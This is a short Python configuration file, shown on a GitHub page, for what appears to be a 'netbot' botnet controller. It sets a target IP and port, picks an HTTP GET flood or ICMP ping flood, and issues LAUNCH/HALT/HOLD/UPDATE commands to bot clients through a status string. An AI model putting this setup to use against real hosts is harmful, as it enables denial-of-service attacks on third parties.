-
Notifications
You must be signed in to change notification settings - Fork 30
/
netbot_config.py
28 lines (18 loc) · 1.14 KB
/
netbot_config.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ATTACK_TARGET_HOST = "192.168.0.105" # IP address of the machine to be attacked.
ATTACK_TARGET_PORT = "3000" # Port Number of the machine to be attacked.
#################################################################################
# Type of Attacks (Other Attacks are not yet supported)
#HTTPFLOOD - Floods the target system with GET requests. (PORT and DELAY parameters required)
#PINGFLOOD - Floods the target system with ICMP echo requests. (PORT AND DELAY parameters not required)
ATTACK_TYPE = "PINGFLOOD"
# Number of seconds delay between the burst of requests. 0 for No Delay
ATTACK_BURST_SECONDS = "0"
#################################################################################
#Status codes that has to be set from the below list.
# HALT - To stop attacks immediately.
# LAUNCH - To immediately start the attack.
# HOLD - Wait for command.
# UPDATE - Update Client.
ATTACK_CODE = "HALT" # Choose any one Flag from above
#################################################################################
ATTACK_STATUS = ATTACK_TARGET_HOST + "_" + ATTACK_TARGET_PORT + "_" + ATTACK_CODE + "_" + ATTACK_TYPE + "_" + ATTACK_BURST_SECONDS